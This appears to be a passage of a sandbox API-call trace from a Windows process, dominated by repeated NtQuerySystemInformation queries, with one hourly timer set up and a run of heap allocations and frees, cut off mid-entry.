NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x28, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff190, Length=0x28, ResultLength=0x0) [0178.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff190, Length=0x28, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x20, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0178.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0178.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x20, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x20, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x20, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x20, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x20, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x20, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.995] CreateTimerQueueTimer (in: phNewTimer=0x27fc8dbaa78, TimerQueue=0x0, Callback=0x7ff6caf656c0, Parameter=0x27fc8dba970, DueTime=0x36ee80, Period=0x36ee80, Flags=0x0 | out: phNewTimer=0x27fc8dbaa78*=0x27fc8de8000) returned 1 [0178.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff5c0, Length=0x28, ResultLength=0x0) [0178.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4d0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4d0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4d0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x50, ResultLength=0x0) [0178.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x50, ResultLength=0x0) [0178.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2f0, Length=0x38, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0179.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff190, Length=0x28, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2f0, Length=0x38, ResultLength=0x0) [0179.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x28, ResultLength=0x0) [0179.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x28, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x20, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x20, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x20, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2f0, Length=0x38, ResultLength=0x0) [0179.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2f0, Length=0x38, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff170, Length=0x20, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0179.120] GetProcessHeap () returned 0x27fc8db0000 [0179.120] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de6d50 [0179.120] GetProcessHeap () returned 0x27fc8db0000 [0179.120] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df63b0 [0179.121] GetProcessHeap () returned 0x27fc8db0000 [0179.121] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x11c) returned 0x27fc8dbad00 [0179.122] GetProcessHeap () returned 0x27fc8db0000 [0179.122] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x128) returned 0x27fc8dbae30 [0179.122] GetProcessHeap () returned 0x27fc8db0000 [0179.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc8df4710 [0179.123] GetProcessHeap () returned 0x27fc8db0000 [0179.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x130) returned 0x27fc8de8760 [0179.123] GetProcessHeap () returned 0x27fc8db0000 [0179.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de88a0 [0179.123] GetProcessHeap () returned 0x27fc8db0000 [0179.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df62a0 [0179.123] GetProcessHeap () returned 0x27fc8db0000 [0179.123] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8620 | out: hHeap=0x27fc8db0000) returned 1 [0179.123] GetProcessHeap () returned 0x27fc8db0000 [0179.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1e4) returned 0x27fc8de8950 [0179.124] GetProcessHeap () returned 0x27fc8db0000 [0179.124] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xf4) returned 0x27fc8de8620 [0179.124] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff468 | out: phModule=0xf7a67ff468*=0x7ffcea380000) returned 1 [0179.124] GetProcAddress (hModule=0x7ffcea380000, lpProcName=0x7ff6cb18bfa0) returned 0x7ffcea425a50 [0179.124] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xf7a67ff590, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xf7a67ff590, ResultLength=0x0) returned 0x0 [0179.125] GetProcessHeap () returned 0x27fc8db0000 [0179.125] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc8df4a90 [0179.125] GetProcessHeap () returned 0x27fc8db0000 [0179.125] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x40) returned 0x27fc8dc22c0 [0179.125] GetProcessHeap () returned 0x27fc8db0000 [0179.125] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc8de8b40 [0179.125] GetProcessHeap () returned 0x27fc8db0000 [0179.125] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc8df6380 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc8df4c10 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbae30 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8760 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de88a0 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df62a0 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8df4710 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8950 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8620 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dc22c0 | out: hHeap=0x27fc8db0000) returned 1 [0179.126] GetProcessHeap () returned 0x27fc8db0000 [0179.126] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8de8b40 | out: 